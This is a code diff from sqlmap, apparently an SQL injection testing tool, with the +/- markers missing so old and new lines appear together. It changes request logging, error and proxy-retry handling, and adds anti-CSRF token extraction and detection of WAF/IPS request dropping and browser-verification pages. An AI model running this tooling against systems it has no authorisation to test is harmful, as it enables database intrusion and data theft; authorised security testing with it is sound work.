kb.pageEncoding = conf.charset
kb.pageEncoding = conf.encoding

# can't do for all responses because we need to support binary files too
if contentType and not isinstance(page, unicode) and "text/" in contentType.lower():
@@ -340,12 +340,12 @@ def decodePage(page, contentEncoding, contentType):

return page

def processResponse(page, responseHeaders):
def processResponse(page, responseHeaders, status=None):
kb.processResponseCounter += 1

page = page or ""

parseResponse(page, responseHeaders if kb.processResponseCounter < PARSE_HEADERS_LIMIT else None)
parseResponse(page, responseHeaders if kb.processResponseCounter < PARSE_HEADERS_LIMIT else None, status)

if not kb.tableFrom and Backend.getIdentifiedDbms() in (DBMS.ACCESS,):
kb.tableFrom = extractRegexResult(SELECT_FROM_TABLE_REGEX, page)
@@ -375,6 +375,13 @@ def processResponse(page, responseHeaders):
conf.paramDict[PLACE.POST][name] = value
conf.parameters[PLACE.POST] = re.sub("(?i)(%s=)[^&]+" % re.escape(name), r"\g<1>%s" % re.escape(value), conf.parameters[PLACE.POST])

if not kb.browserVerification and re.search(r"(?i)browser.?verification", page or ""):
kb.browserVerification = True
warnMsg = "potential browser verification protection mechanism detected"
if re.search(r"(?i)CloudFlare", page):
warnMsg += " (CloudFlare)"
singleTimeWarnMessage(warnMsg)

if not kb.captchaDetected and re.search(r"(?i)captcha", page or ""):
for match in re.finditer(r"(?si)<form.+?</form>", page):
if re.search(r"(?i)captcha", match.group(0)):

@@ -81,7 +81,6 @@ from lib.core.exception import SqlmapTokenException
from lib.core.exception import SqlmapValueException
from lib.core.settings import ASTERISK_MARKER
from lib.core.settings import BOUNDARY_BACKSLASH_MARKER
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
from lib.core.settings import DEFAULT_CONTENT_TYPE
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
@@ -105,6 +104,7 @@ from lib.core.settings import RANDOM_STRING_MARKER
from lib.core.settings import REPLACEMENT_MARKER
from lib.core.settings import TEXT_CONTENT_TYPE_REGEX
from lib.core.settings import UNENCODED_ORIGINAL_VALUE
from lib.core.settings import UNICODE_ENCODING
from lib.core.settings import URI_HTTP_HEADER
from lib.core.settings import WARN_TIME_STDEV
from lib.request.basic import decodePage
@@ -222,6 +222,8 @@ class Connect(object):
the target URL page content
"""

start = time.time()

if isinstance(conf.delay, (int, float)) and conf.delay > 0:
time.sleep(conf.delay)

@@ -256,6 +258,7 @@ class Connect(object):
refreshing = kwargs.get("refreshing", False)
retrying = kwargs.get("retrying", False)
crawling = kwargs.get("crawling", False)
checking = kwargs.get("checking", False)
skipRead = kwargs.get("skipRead", False)

if multipart:
|
||||
# url splitted with space char while urlencoding it in the later phase
|
||||
url = url.replace(" ", "%20")
|
||||
|
||||
if "://" not in url:
|
||||
url = "http://%s" % url
|
||||
|
||||
conn = None
|
||||
code = None
|
||||
page = None
|
||||
code = None
|
||||
status = None
|
||||
|
||||
_ = urlparse.urlsplit(url)
|
||||
requestMsg = u"HTTP request [#%d]:\n%s " % (threadData.lastRequestUID, method or (HTTPMETHOD.POST if post is not None else HTTPMETHOD.GET))
|
||||
requestMsg += ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) if not any((refreshing, crawling)) else url
|
||||
requestMsg = u"HTTP request [#%d]:\r\n%s " % (threadData.lastRequestUID, method or (HTTPMETHOD.POST if post is not None else HTTPMETHOD.GET))
|
||||
requestMsg += getUnicode(("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) if not any((refreshing, crawling, checking)) else url)
|
||||
responseMsg = u"HTTP response "
|
||||
requestHeaders = u""
|
||||
responseHeaders = None
|
||||
@@ -305,7 +312,7 @@ class Connect(object):
|
||||
params = urlencode(params)
|
||||
url = "%s?%s" % (url, params)
|
||||
|
||||
elif any((refreshing, crawling)):
|
||||
elif any((refreshing, crawling, checking)):
|
||||
pass
|
||||
|
||||
elif target:
|
||||
@@ -377,11 +384,7 @@ class Connect(object):
|
||||
headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie})
|
||||
|
||||
if auxHeaders:
|
||||
for key, value in auxHeaders.items():
|
||||
for _ in headers.keys():
|
||||
if _.upper() == key.upper():
|
||||
del headers[_]
|
||||
headers[key] = value
|
||||
headers = forgeHeaders(auxHeaders, headers)
|
||||
|
||||
for key, value in headers.items():
|
||||
del headers[key]
|
||||
@@ -407,13 +410,13 @@ class Connect(object):
|
||||
responseHeaders = _(ws.getheaders())
|
||||
responseHeaders.headers = ["%s: %s\r\n" % (_[0].capitalize(), _[1]) for _ in responseHeaders.items()]
|
||||
|
||||
requestHeaders += "\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
|
||||
requestMsg += "\n%s" % requestHeaders
|
||||
requestHeaders += "\r\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
|
||||
requestMsg += "\r\n%s" % requestHeaders
|
||||
|
||||
if post is not None:
|
||||
requestMsg += "\n\n%s" % getUnicode(post)
|
||||
requestMsg += "\r\n\r\n%s" % getUnicode(post)
|
||||
|
||||
requestMsg += "\n"
|
||||
requestMsg += "\r\n"
|
||||
|
||||
threadData.lastRequestMsg = requestMsg
|
||||
|
||||
@@ -426,26 +429,26 @@ class Connect(object):
|
||||
else:
|
||||
req = urllib2.Request(url, post, headers)
|
||||
|
||||
requestHeaders += "\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items()])
|
||||
requestHeaders += "\r\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items()])
|
||||
|
||||
if not getRequestHeader(req, HTTP_HEADER.COOKIE) and conf.cj:
|
||||
conf.cj._policy._now = conf.cj._now = int(time.time())
|
||||
cookies = conf.cj._cookies_for_request(req)
|
||||
requestHeaders += "\n%s" % ("Cookie: %s" % ";".join("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value)) for cookie in cookies))
|
||||
requestHeaders += "\r\n%s" % ("Cookie: %s" % ";".join("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value)) for cookie in cookies))
|
||||
|
||||
if post is not None:
|
||||
if not getRequestHeader(req, HTTP_HEADER.CONTENT_LENGTH):
|
||||
requestHeaders += "\n%s: %d" % (string.capwords(HTTP_HEADER.CONTENT_LENGTH), len(post))
|
||||
requestHeaders += "\r\n%s: %d" % (string.capwords(HTTP_HEADER.CONTENT_LENGTH), len(post))
|
||||
|
||||
if not getRequestHeader(req, HTTP_HEADER.CONNECTION):
|
||||
requestHeaders += "\n%s: %s" % (HTTP_HEADER.CONNECTION, "close" if not conf.keepAlive else "keep-alive")
|
||||
requestHeaders += "\r\n%s: %s" % (HTTP_HEADER.CONNECTION, "close" if not conf.keepAlive else "keep-alive")
|
||||
|
||||
requestMsg += "\n%s" % requestHeaders
|
||||
requestMsg += "\r\n%s" % requestHeaders
|
||||
|
||||
if post is not None:
|
||||
requestMsg += "\n\n%s" % getUnicode(post)
|
||||
requestMsg += "\r\n\r\n%s" % getUnicode(post)
|
||||
|
||||
requestMsg += "\n"
|
||||
requestMsg += "\r\n"
|
||||
|
||||
if not multipart:
|
||||
threadData.lastRequestMsg = requestMsg
|
||||
@@ -539,10 +542,22 @@ class Connect(object):
|
||||
warnMsg = "problem occurred during connection closing ('%s')" % getSafeExString(ex)
|
||||
logger.warn(warnMsg)
|
||||
|
||||
except SqlmapConnectionException, ex:
|
||||
if conf.proxyList and not kb.threadException:
|
||||
warnMsg = "unable to connect to the target URL ('%s')" % ex
|
||||
logger.critical(warnMsg)
|
||||
threadData.retriesCount = conf.retries
|
||||
return Connect._retryProxy(**kwargs)
|
||||
else:
|
||||
raise
|
||||
|
||||
except urllib2.HTTPError, ex:
|
||||
page = None
|
||||
responseHeaders = None
|
||||
|
||||
if checking:
|
||||
return None, None, None
|
||||
|
||||
try:
|
||||
page = ex.read() if not skipRead else None
|
||||
responseHeaders = ex.info()
|
||||
@@ -561,63 +576,65 @@ class Connect(object):
|
||||
page = page if isinstance(page, unicode) else getUnicode(page)
|
||||
|
||||
code = ex.code
|
||||
status = getUnicode(ex.msg)
|
||||
|
||||
kb.originalCode = kb.originalCode or code
|
||||
threadData.lastHTTPError = (threadData.lastRequestUID, code)
|
||||
threadData.lastHTTPError = (threadData.lastRequestUID, code, status)
|
||||
kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1
|
||||
|
||||
status = getUnicode(ex.msg)
|
||||
responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status)
|
||||
responseMsg += "[#%d] (%d %s):\r\n" % (threadData.lastRequestUID, code, status)
|
||||
|
||||
if responseHeaders:
|
||||
logHeaders = "\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
|
||||
logHeaders = "\r\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
|
||||
|
||||
logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]))
|
||||
logHTTPTraffic(requestMsg, "%s%s\r\n\r\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]), start, time.time())
|
||||
|
||||
skipLogTraffic = True
|
||||
|
||||
if conf.verbose <= 5:
|
||||
responseMsg += getUnicode(logHeaders)
|
||||
elif conf.verbose > 5:
|
||||
responseMsg += "%s\n\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])
|
||||
responseMsg += "%s\r\n\r\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])
|
||||
|
||||
if not multipart:
|
||||
logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg)
|
||||
|
||||
if ex.code == httplib.UNAUTHORIZED and not conf.ignore401:
|
||||
errMsg = "not authorized, try to provide right HTTP "
|
||||
errMsg += "authentication type and valid credentials (%d)" % code
|
||||
raise SqlmapConnectionException(errMsg)
|
||||
elif ex.code == httplib.NOT_FOUND:
|
||||
if raise404:
|
||||
errMsg = "page not found (%d)" % code
|
||||
if ex.code != conf.ignoreCode:
|
||||
if ex.code == httplib.UNAUTHORIZED:
|
||||
errMsg = "not authorized, try to provide right HTTP "
|
||||
errMsg += "authentication type and valid credentials (%d)" % code
|
||||
raise SqlmapConnectionException(errMsg)
|
||||
else:
|
||||
debugMsg = "page not found (%d)" % code
|
||||
singleTimeLogMessage(debugMsg, logging.DEBUG)
|
||||
processResponse(page, responseHeaders)
|
||||
elif ex.code == httplib.GATEWAY_TIMEOUT:
|
||||
if ignoreTimeout:
|
||||
return None if not conf.ignoreTimeouts else "", None, None
|
||||
else:
|
||||
warnMsg = "unable to connect to the target URL (%d - %s)" % (ex.code, httplib.responses[ex.code])
|
||||
if threadData.retriesCount < conf.retries and not kb.threadException:
|
||||
warnMsg += ". sqlmap is going to retry the request"
|
||||
logger.critical(warnMsg)
|
||||
return Connect._retryProxy(**kwargs)
|
||||
elif kb.testMode:
|
||||
logger.critical(warnMsg)
|
||||
return None, None, None
|
||||
elif ex.code == httplib.NOT_FOUND:
|
||||
if raise404:
|
||||
errMsg = "page not found (%d)" % code
|
||||
raise SqlmapConnectionException(errMsg)
|
||||
else:
|
||||
raise SqlmapConnectionException(warnMsg)
|
||||
else:
|
||||
debugMsg = "got HTTP error code: %d (%s)" % (code, status)
|
||||
logger.debug(debugMsg)
|
||||
debugMsg = "page not found (%d)" % code
|
||||
singleTimeLogMessage(debugMsg, logging.DEBUG)
|
||||
elif ex.code == httplib.GATEWAY_TIMEOUT:
|
||||
if ignoreTimeout:
|
||||
return None if not conf.ignoreTimeouts else "", None, None
|
||||
else:
|
||||
warnMsg = "unable to connect to the target URL (%d - %s)" % (ex.code, httplib.responses[ex.code])
|
||||
if threadData.retriesCount < conf.retries and not kb.threadException:
|
||||
warnMsg += ". sqlmap is going to retry the request"
|
||||
logger.critical(warnMsg)
|
||||
return Connect._retryProxy(**kwargs)
|
||||
elif kb.testMode:
|
||||
logger.critical(warnMsg)
|
||||
return None, None, None
|
||||
else:
|
||||
raise SqlmapConnectionException(warnMsg)
|
||||
else:
|
||||
debugMsg = "got HTTP error code: %d (%s)" % (code, status)
|
||||
logger.debug(debugMsg)
|
||||
|
||||
except (urllib2.URLError, socket.error, socket.timeout, httplib.HTTPException, struct.error, binascii.Error, ProxyError, SqlmapCompressionException, WebSocketException, TypeError):
|
||||
except (urllib2.URLError, socket.error, socket.timeout, httplib.HTTPException, struct.error, binascii.Error, ProxyError, SqlmapCompressionException, WebSocketException, TypeError, ValueError):
|
||||
tbMsg = traceback.format_exc()
|
||||
|
||||
if "no host given" in tbMsg:
|
||||
if checking:
|
||||
return None, None, None
|
||||
elif "no host given" in tbMsg:
|
||||
warnMsg = "invalid URL address used (%s)" % repr(url)
|
||||
raise SqlmapSyntaxException(warnMsg)
|
||||
elif "forcibly closed" in tbMsg or "Connection is already closed" in tbMsg:
|
||||
@@ -632,6 +649,7 @@ class Connect(object):
|
||||
|
||||
if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED):
|
||||
singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS/IDS) is dropping 'suspicious' requests")
|
||||
kb.droppingRequests = True
|
||||
warnMsg = "connection timed out to the target URL"
|
||||
elif "Connection reset" in tbMsg:
|
||||
if not conf.disablePrecon:
|
||||
@@ -640,6 +658,7 @@ class Connect(object):
|
||||
|
||||
if kb.testMode:
|
||||
singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS/IDS) is resetting 'suspicious' requests")
|
||||
kb.droppingRequests = True
|
||||
warnMsg = "connection reset to the target URL"
|
||||
elif "URLError" in tbMsg or "error" in tbMsg:
|
||||
warnMsg = "unable to connect to the target URL"
|
||||
@@ -648,6 +667,8 @@ class Connect(object):
|
||||
warnMsg += " ('%s')" % match.group(1).strip()
|
||||
elif "NTLM" in tbMsg:
|
||||
warnMsg = "there has been a problem with NTLM authentication"
|
||||
elif "Invalid header name" in tbMsg: # (e.g. PostgreSQL ::Text payload)
|
||||
return None, None, None
|
||||
elif "BadStatusLine" in tbMsg:
|
||||
warnMsg = "connection dropped or unknown HTTP "
|
||||
warnMsg += "status code received"
|
||||
@@ -667,6 +688,9 @@ class Connect(object):
|
||||
if "BadStatusLine" not in tbMsg and any((conf.proxy, conf.tor)):
|
||||
warnMsg += " or proxy"
|
||||
|
||||
if silent:
|
||||
return None, None, None
|
||||
|
||||
with kb.locks.connError:
|
||||
kb.connErrorCounter += 1
|
||||
|
||||
@@ -680,9 +704,7 @@ class Connect(object):
|
||||
if kb.connErrorChoice is False:
|
||||
raise SqlmapConnectionException(warnMsg)
|
||||
|
||||
if silent:
|
||||
return None, None, None
|
||||
elif "forcibly closed" in tbMsg:
|
||||
if "forcibly closed" in tbMsg:
|
||||
logger.critical(warnMsg)
|
||||
return None, None, None
|
||||
elif ignoreTimeout and any(_ in tbMsg for _ in ("timed out", "IncompleteRead")):
|
||||
@@ -709,7 +731,7 @@ class Connect(object):
page = getUnicode(page)
socket.setdefaulttimeout(conf.timeout)
processResponse(page, responseHeaders)
processResponse(page, responseHeaders, status)
if conn and getattr(conn, "redurl", None):
_ = urlparse.urlsplit(conn.redurl)
@@ -721,20 +743,20 @@ class Connect(object):
requestMsg = re.sub("(?i)Content-length: \d+\n", "", requestMsg)
requestMsg = re.sub("(?s)\n\n.+", "\n", requestMsg)
responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, conn.code, status)
responseMsg += "[#%d] (%d %s):\r\n" % (threadData.lastRequestUID, conn.code, status)
else:
responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status)
responseMsg += "[#%d] (%d %s):\r\n" % (threadData.lastRequestUID, code, status)
if responseHeaders:
logHeaders = "\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
logHeaders = "\r\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
if not skipLogTraffic:
logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]))
logHTTPTraffic(requestMsg, "%s%s\r\n\r\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]), start, time.time())
if conf.verbose <= 5:
responseMsg += getUnicode(logHeaders)
elif conf.verbose > 5:
responseMsg += "%s\n\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])
responseMsg += "%s\r\n\r\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])
if not multipart:
logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg)
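The hunk above switches the logged response headers from `"\n"` to `"\r\n"` joins and passes start/end timestamps to `logHTTPTraffic()`. As a minimal sketch (not sqlmap's own code, helper name and arguments assumed), this is how a response can be serialized with CRLF framing so the stored traffic reads like raw HTTP:

```python
# Standalone sketch: serializing a logged HTTP response with CRLF line endings,
# mirroring the "\n" -> "\r\n" change above. Names here are illustrative only.
import time

def serialize_response(code, status, headers, body, max_chunk=1024):
    # Status line and headers are joined with CRLF, as in raw HTTP framing
    lines = ["HTTP response [#1] (%d %s):" % (code, status)]
    lines.extend("%s: %s" % (key.capitalize(), value) for key, value in headers.items())
    # A blank line (CRLF CRLF) separates the headers from the (truncated) body
    return "\r\n".join(lines) + "\r\n\r\n" + (body or "")[:max_chunk]

start = time.time()
message = serialize_response(200, "OK", {"content-type": "text/html"}, "<html>...</html>")
duration = time.time() - start  # analogous to the timestamps now passed to logHTTPTraffic()
print(message)
```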
@@ -745,8 +767,8 @@ class Connect(object):
|
||||
def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True):
|
||||
"""
|
||||
This method calls a function to get the target URL page content
|
||||
and returns its page MD5 hash or a boolean value in case of
|
||||
string match check ('--string' command line parameter)
|
||||
and returns its page ratio (0 <= ratio <= 1) or a boolean value
|
||||
representing False/True match in case of !getRatioValue
|
||||
"""
|
||||
|
||||
if conf.direct:
|
||||
@@ -831,8 +853,7 @@ class Connect(object):
if place == PLACE.COOKIE or place == PLACE.CUSTOM_HEADER and value.split(',')[0] == HTTP_HEADER.COOKIE:
if kb.cookieEncodeChoice is None:
msg = "do you want to URL encode cookie values (implementation specific)? %s" % ("[Y/n]" if not conf.url.endswith(".aspx") else "[y/N]") # Reference: https://support.microsoft.com/en-us/kb/313282
choice = readInput(msg, default='Y' if not conf.url.endswith(".aspx") else 'N')
kb.cookieEncodeChoice = choice.upper().strip() == 'Y'
kb.cookieEncodeChoice = readInput(msg, default='Y' if not conf.url.endswith(".aspx") else 'N', boolean=True)
if not kb.cookieEncodeChoice:
skip = True
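The change above replaces the manual `choice.upper().strip() == 'Y'` handling with a `boolean=True` mode of `readInput()`. A rough sketch of such a prompt helper (an assumption for illustration, not sqlmap's actual implementation) looks like this:

```python
# Minimal sketch of a readInput-style prompt with a boolean=True mode
# (illustrative only; sqlmap's own readInput() has more behaviour).
def read_input(message, default=None, boolean=False):
    try:
        reply = raw_input  # Python 2
    except NameError:
        reply = input      # Python 3
    answer = reply("%s " % message).strip() or (default or "")
    if boolean:
        # 'Y'/'y' (or an empty answer falling back to a 'Y' default) means True
        return answer.upper().startswith('Y')
    return answer

encode_cookies = read_input("do you want to URL encode cookie values? [Y/n]", default='Y', boolean=True)
```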
@@ -884,7 +905,7 @@ class Connect(object):
|
||||
post = value
|
||||
|
||||
if PLACE.CUSTOM_POST in conf.parameters:
|
||||
post = conf.parameters[PLACE.CUSTOM_POST].replace(CUSTOM_INJECTION_MARK_CHAR, "") if place != PLACE.CUSTOM_POST or not value else value
|
||||
post = conf.parameters[PLACE.CUSTOM_POST].replace(kb.customInjectionMark, "") if place != PLACE.CUSTOM_POST or not value else value
|
||||
post = post.replace(ASTERISK_MARKER, '*') if post else post
|
||||
|
||||
if PLACE.COOKIE in conf.parameters:
|
||||
@@ -923,12 +944,14 @@ class Connect(object):
return retVal
page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, data=conf.data if conf.csrfUrl == conf.url else None, method=conf.method if conf.csrfUrl == conf.url else None, cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST))
match = re.search(r"<input[^>]+name=[\"']?%s[\"']?\s[^>]*value=(\"([^\"]+)|'([^']+)|([^ >]+))" % re.escape(conf.csrfToken), page or "")
token = (match.group(2) or match.group(3) or match.group(4)) if match else None
token = extractRegexResult(r"(?i)<input[^>]+\bname=[\"']?%s[\"']?[^>]*\bvalue=(?P<result>(\"([^\"]+)|'([^']+)|([^ >]+)))" % re.escape(conf.csrfToken), page or "")
if not token:
match = re.search(r"%s[\"']:[\"']([^\"']+)" % re.escape(conf.csrfToken), page or "")
token = match.group(1) if match else None
token = extractRegexResult(r"(?i)<input[^>]+\bvalue=(?P<result>(\"([^\"]+)|'([^']+)|([^ >]+)))[^>]+\bname=[\"']?%s[\"']?" % re.escape(conf.csrfToken), page or "")
if not token:
match = re.search(r"%s[\"']:[\"']([^\"']+)" % re.escape(conf.csrfToken), page or "")
token = match.group(1) if match else None
if not token:
if conf.csrfUrl != conf.url and code == httplib.OK:
@@ -956,6 +979,8 @@ class Connect(object):
raise SqlmapTokenException, errMsg
if token:
token = token.strip("'\"")
for place in (PLACE.GET, PLACE.POST):
if place in conf.parameters:
if place == PLACE.GET and get:
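The hunk above moves anti-CSRF token extraction to `extractRegexResult()` with two patterns, so the token is found whether the `<input>` tag lists `name` before `value` or the other way round, with a JSON-style fallback. A standalone sketch of that lookup order (helper name and patterns are illustrative, not sqlmap's exact API):

```python
# Standalone sketch of anti-CSRF token extraction with both attribute orders
# and a JSON-style fallback, similar in spirit to the change above.
import re

def find_csrf_token(page, name):
    patterns = (
        # <input name="token" ... value="...">
        r"(?i)<input[^>]+\bname=[\"']?%s[\"']?[^>]*\bvalue=(?P<result>\"[^\"]+\"|'[^']+'|[^ >]+)" % re.escape(name),
        # <input value="..." ... name="token">
        r"(?i)<input[^>]+\bvalue=(?P<result>\"[^\"]+\"|'[^']+'|[^ >]+)[^>]+\bname=[\"']?%s[\"']?" % re.escape(name),
        # "token": "value" (e.g. token delivered inside embedded JSON)
        r"%s[\"']\s*:\s*[\"'](?P<result>[^\"']+)" % re.escape(name),
    )
    for pattern in patterns:
        match = re.search(pattern, page or "")
        if match:
            return match.group("result").strip("'\"")
    return None

print(find_csrf_token('<input value="abc123" type="hidden" name="csrf">', "csrf"))  # abc123
```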
@@ -1023,16 +1048,19 @@ class Connect(object):
try:
compiler.parse(unicodeencode(conf.evalCode.replace(';', '\n')))
except SyntaxError, ex:
original = replacement = ex.text.strip()
for _ in re.findall(r"[A-Za-z_]+", original)[::-1]:
if _ in keywords:
replacement = replacement.replace(_, "%s%s" % (_, EVALCODE_KEYWORD_SUFFIX))
if ex.text:
original = replacement = ex.text.strip()
for _ in re.findall(r"[A-Za-z_]+", original)[::-1]:
if _ in keywords:
replacement = replacement.replace(_, "%s%s" % (_, EVALCODE_KEYWORD_SUFFIX))
break
if original == replacement:
conf.evalCode = conf.evalCode.replace(EVALCODE_KEYWORD_SUFFIX, "")
break
if original == replacement:
conf.evalCode = conf.evalCode.replace(EVALCODE_KEYWORD_SUFFIX, "")
break
else:
conf.evalCode = conf.evalCode.replace(getUnicode(ex.text.strip(), UNICODE_ENCODING), replacement)
else:
conf.evalCode = conf.evalCode.replace(ex.text.strip(), replacement)
break
else:
break
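The hunk above guards the `SyntaxError` handler with `if ex.text:` and keeps retrying compilation of the user's `--eval` code after renaming parameter names that collide with Python keywords. A simplified sketch of that rename-and-retry loop, using the `ast` module instead of the older `compiler` module and a made-up suffix constant:

```python
# Standalone sketch of the rename-and-retry idea behind EVALCODE_KEYWORD_SUFFIX:
# parameter names that collide with Python keywords get a suffix appended until
# the snippet compiles (simplified; not the exact sqlmap implementation).
import ast
import keyword
import re

SUFFIX = "_substitute"  # hypothetical stand-in for EVALCODE_KEYWORD_SUFFIX

def make_compilable(code):
    while True:
        try:
            ast.parse(code)
            return code
        except SyntaxError as ex:
            if not ex.text:               # nothing usable to rewrite
                return code
            line = ex.text.strip()
            fixed = line
            for word in re.findall(r"[A-Za-z_]+", line)[::-1]:
                if keyword.iskeyword(word):
                    fixed = fixed.replace(word, word + SUFFIX)
                    break
            if fixed == line:             # no keyword found, give up
                return code
            code = code.replace(line, fixed)

print(make_compilable("import=1; id=import*2"))  # import_substitute=1; id=import_substitute*2
```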
@@ -1051,39 +1079,39 @@ class Connect(object):
|
||||
if name != "__builtins__" and originals.get(name, "") != value:
|
||||
if isinstance(value, (basestring, int)):
|
||||
found = False
|
||||
value = getUnicode(value)
|
||||
value = getUnicode(value, UNICODE_ENCODING)
|
||||
|
||||
if kb.postHint and re.search(r"\b%s\b" % re.escape(name), post or ""):
|
||||
if kb.postHint in (POST_HINT.XML, POST_HINT.SOAP):
|
||||
if re.search(r"<%s\b" % re.escape(name), post):
|
||||
found = True
|
||||
post = re.sub(r"(?s)(<%s\b[^>]*>)(.*?)(</%s)" % (re.escape(name), re.escape(name)), "\g<1>%s\g<3>" % value, post)
|
||||
post = re.sub(r"(?s)(<%s\b[^>]*>)(.*?)(</%s)" % (re.escape(name), re.escape(name)), "\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)
|
||||
elif re.search(r"\b%s>" % re.escape(name), post):
|
||||
found = True
|
||||
post = re.sub(r"(?s)(\b%s>)(.*?)(</[^<]*\b%s>)" % (re.escape(name), re.escape(name)), "\g<1>%s\g<3>" % value, post)
|
||||
post = re.sub(r"(?s)(\b%s>)(.*?)(</[^<]*\b%s>)" % (re.escape(name), re.escape(name)), "\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)
|
||||
|
||||
regex = r"\b(%s)\b([^\w]+)(\w+)" % re.escape(name)
|
||||
if not found and re.search(regex, (post or "")):
|
||||
found = True
|
||||
post = re.sub(regex, "\g<1>\g<2>%s" % value, post)
|
||||
post = re.sub(regex, "\g<1>\g<2>%s" % value.replace('\\', r'\\'), post)
|
||||
|
||||
regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), re.escape(name), re.escape(delimiter))
|
||||
if not found and re.search(regex, (post or "")):
|
||||
found = True
|
||||
post = re.sub(regex, "\g<1>%s\g<3>" % value, post)
|
||||
post = re.sub(regex, "\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)
|
||||
|
||||
if re.search(regex, (get or "")):
|
||||
found = True
|
||||
get = re.sub(regex, "\g<1>%s\g<3>" % value, get)
|
||||
get = re.sub(regex, "\g<1>%s\g<3>" % value.replace('\\', r'\\'), get)
|
||||
|
||||
if re.search(regex, (query or "")):
|
||||
found = True
|
||||
uri = re.sub(regex.replace(r"\A", r"\?"), "\g<1>%s\g<3>" % value, uri)
|
||||
uri = re.sub(regex.replace(r"\A", r"\?"), "\g<1>%s\g<3>" % value.replace('\\', r'\\'), uri)
|
||||
|
||||
regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER), name, re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER))
|
||||
if re.search(regex, (cookie or "")):
|
||||
found = True
|
||||
cookie = re.sub(regex, "\g<1>%s\g<3>" % value, cookie)
|
||||
cookie = re.sub(regex, "\g<1>%s\g<3>" % value.replace('\\', r'\\'), cookie)
|
||||
|
||||
if not found:
|
||||
if post is not None:
|
||||
@@ -1212,7 +1240,7 @@ class Connect(object):
|
||||
kb.permissionFlag = re.search(PERMISSION_DENIED_REGEX, page or "", re.I) is not None
|
||||
|
||||
if content or response:
|
||||
return page, headers
|
||||
return page, headers, code
|
||||
|
||||
if getRatioValue:
|
||||
return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison(page, headers, code, getRatioValue=True, pageLength=pageLength)
|
||||
|
||||
@@ -42,6 +42,7 @@ from lib.core.exception import SqlmapConnectionException
|
||||
from lib.core.exception import SqlmapDataException
|
||||
from lib.core.exception import SqlmapNotVulnerableException
|
||||
from lib.core.exception import SqlmapUserQuitException
|
||||
from lib.core.settings import GET_VALUE_UPPERCASE_KEYWORDS
|
||||
from lib.core.settings import MAX_TECHNIQUES_PER_VALUE
|
||||
from lib.core.settings import SQL_SCALAR_REGEX
|
||||
from lib.core.threads import getCurrentThreadData
|
||||
@@ -345,6 +346,9 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
|
||||
kb.safeCharEncode = safeCharEncode
|
||||
kb.resumeValues = resumeValue
|
||||
|
||||
for keyword in GET_VALUE_UPPERCASE_KEYWORDS:
|
||||
expression = re.sub("(?i)(\A|\(|\)|\s)%s(\Z|\(|\)|\s)" % keyword, r"\g<1>%s\g<2>" % keyword, expression)
|
||||
|
||||
if suppressOutput is not None:
|
||||
pushValue(getCurrentThreadData().disableStdOut)
|
||||
getCurrentThreadData().disableStdOut = suppressOutput
|
||||
@@ -356,7 +360,7 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
|
||||
if expected == EXPECTED.BOOL:
|
||||
